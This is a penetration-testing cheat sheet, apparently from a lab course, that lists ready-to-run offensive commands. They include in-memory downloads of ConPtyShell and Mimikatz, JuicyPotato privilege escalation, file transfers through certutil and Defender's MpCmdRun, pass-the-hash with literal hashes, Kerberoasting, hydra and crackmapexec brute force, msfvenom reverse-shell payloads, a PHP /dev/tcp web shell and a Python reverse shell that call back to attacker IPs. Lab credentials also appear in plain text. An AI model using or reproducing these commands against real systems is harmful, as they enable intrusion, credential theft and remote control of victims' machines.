Powershell

  • ConPtyShell

    IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 192.168.119.160 -RemotePort 4444 -Rows 24 -Cols 80
    
  • Execute mimikatz directly in memory

    IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.160:4444/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    
  • JuicyPotato

    JuicyPotato -l 1337 -p c:32.exe -a "/c powershell.exe IEX(IWR http://192.168.119.160/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 192.168.119.160 -RemotePort 4444 -Rows 24 -Cols 80" -t *
    
  • File Transfer

    certutil.exe -urlcache -f http://192.168.119.203/PsExec.exe PsExec.exe
    
    C:Defender\4.18.2008.9-0.exe -url  -path
    
    MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
    
    Download file (renamed certutil.exe):

    renamed.exe -urlcache -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
    
  • Remote login using Psexec

    Psexec.exe /accepteula -u alice -p alicewashere nc.exe 192.168.119.160 443 -e "c:32.exe"
    
  • Python BloodHound

    python3 bloodhound-python -u alice -p ThisIsTheUsersPassword01 -d svcorp.com -gc sv-dc01.svcorp.com -c all -ns 10.11.1.20
    

Linux

  • PassTheHash

    psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ee0c207898a5bccc01f38115019ca2fb administrator@10.11.1.21

    pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:ee0c207898a5bccc01f38115019ca2fb //10.11.1.24 cmd

  • Brute Force

    crackmapexec smb 10.11.1.21 -u user.txt -p ThisIsTheUsersPassword21 --continue-on-success

  • Impacket

    Get SPN tickets:

    GetUserSPNs.py -request -dc-ip 10.11.1.20 svcorp.com/alice

    Check ASREPRoast Domain:

    GetNPUsers.py -dc-ip 10.11.1.20 -request 'svcorp.com/'

  • Create local server

    impacket-smbserver mrjck $(pwd)

SSH

  • Local Port Forwarding

    ssh -L 80:127.0.0.1:80 username@192.168.0.1

Web Fuzzing

  • ffuf

    ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.12.1.2/FUZZ

  • hydra

    hydra -l root@localhost -P docswords.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=USER&Password=PASS:F=Login failed" -I

Reverse Shell

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp lhost=192.168.119.160 lport=9999 -b "\x00" -f exe -o rshell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.203 LPORT=4444 -f hta-psh -o evil.hta

msfvenom -p windows/shell_reverse_tcp  LHOST=192.168.119.160 LPORT=4444 EXITFUNC=thread -f asp -a x86 --platform windows -o metasp.asp

msfvenom -p php/reverse_php LHOST=192.168.119.160 LPORT=4444 -f raw > shell.php

<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.59/443 0>&1");?>

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.160",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Tool Usage

rpcclient -U "svcorp\alice" 10.11.1.20

mssqlclient.py sa@10.11.1.31 -windows-auth

smbmap -d svcorp -u alice -p ThisIsTheUsersPassword01 -H 10.11.1.20 -R 'IPC$' -A lsass -q

wpscan --url http://10.12.1.7 --enumerate ap --plugins-detection aggressive

rsync -Pavz Twisted-20.3.0.tar.bz2 gibson@10.11.1.71:~/.

ssh-copy-id gibson@10.11.1.71